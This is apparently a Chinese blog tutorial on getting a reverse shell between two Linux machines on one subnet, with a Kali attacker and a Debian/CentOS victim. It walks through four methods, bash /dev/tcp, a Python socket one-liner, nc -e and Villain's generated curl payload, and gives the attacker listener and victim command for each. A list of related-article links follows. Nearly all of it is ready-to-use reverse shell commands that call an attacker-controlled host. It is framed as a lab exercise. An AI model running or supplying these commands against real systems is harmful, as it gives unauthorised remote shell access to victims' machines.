2024 同一个网段,反弹shell四种方法【linux版本】bash、python、nc、villian反弹shell图解步骤

实验环境准备(同一个网段下,我是桥接的虚拟机)

一、bash反弹shell

二、python反弹shell

三、nc反弹shell

四、villain反弹shell


实验环境准备(同一个网段下,我是桥接的虚拟机)

一台kali的linux(攻击者)

一台centos7/debian[另一个linux](受害者)

一、bash反弹shell

注意:自定义的端口号需要保持一致哦

1、kali(攻击者)运行命令

复制代码
nc -lvp 自定义端口号

2、debian(受害者)运行命令

复制代码
 bash -i >& /dev/tcp/攻击者主机的ip/自定义的端口号 0>&1

3、结果在kali这边输出,并且已经连接成功,我们可以执行whoami查看权限

复制代码
whoami

二、python反弹shell

注意:自定义的端口号需要保持一致哦

1、kali(攻击者)运行命令

复制代码
nc -lvp 自定义端口号

2、debian(受害者)运行命令

注意修改攻击者的ip和端口号

复制代码
python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('攻击者的主机ip',自定义的端口号));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

3、结果在kali这边输出,并且已经连接成功,我们可以执行whoami查看权限

复制代码
whoami

三、nc反弹shell

注意:自定义的端口号需要保持一致哦

1、kali(攻击者)运行命令

复制代码
nc -lvp 自定义端口号

2、debian(受害者)运行命令

复制代码
nc -e /bin/bash 攻击者ip 自定义的端口号

3、结果在kali这边输出,(这个不回显)我们可以直接执行whoami查看权限

复制代码
whoami

四、villain反弹shell

1、kali(攻击者)运行命令

①运行villain,需要先安装哦

复制代码
villain

②生成linux的payload命令复制灰色区域的文字到debian的命令行中

温馨提示:可以在villain中使用help generate查看windows的payload生成方法

复制代码
generate payload=linux/hoaxshell/sh_curl lhost=eth0

2、debian(受害者)复制并运行刚才生成的payload命令

3、结果在kali这边输出

②我们查看上线的主机

复制代码
sessions

②进入shell,shell session的英文编码id,控制一下debian(受害者)

复制代码
shell sessionID

③whoami看一下权限

复制代码
whoami
相关推荐
FJW02081417 小时前
DevOps——CI/CD持续集成与持续交付/部署的理解与部署
运维·ci/cd·devops
emma羊羊18 小时前
【weblogic】文件上传漏洞
安全·网络安全·靶场·weblogic
Java 码农18 小时前
Linux shell sed 命令基础
linux·运维·服务器
yong158585534318 小时前
1. Linux C++ muduo 库学习——库的编译安装
linux·c++·学习
jenchoi41318 小时前
【2025-11-01】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
网络·安全·web安全·网络安全
fyakm18 小时前
Linux网络接口配置:静态IP与动态IP设置(附代码示例)
linux·运维·tcp/ip
怀旧,18 小时前
【Linux系统编程】5. 基础开发⼯具(下)
linux·运维·服务器
喵叔哟18 小时前
10. 从0到上线:.NET 8 + ML.NET LTR 智能类目匹配实战--Web API 接口与前端集成:部署与生产运维:稳定性、可观测与成本
运维
杰克崔19 小时前
内核里常用宏BUG_ON/WARN_ON/WARN_ONCE
linux·运维·服务器
一枚正在学习的小白19 小时前
k8s的包管理工具helm3--流程控制语句和变量(3)
linux·运维·服务器·云原生·kubernetes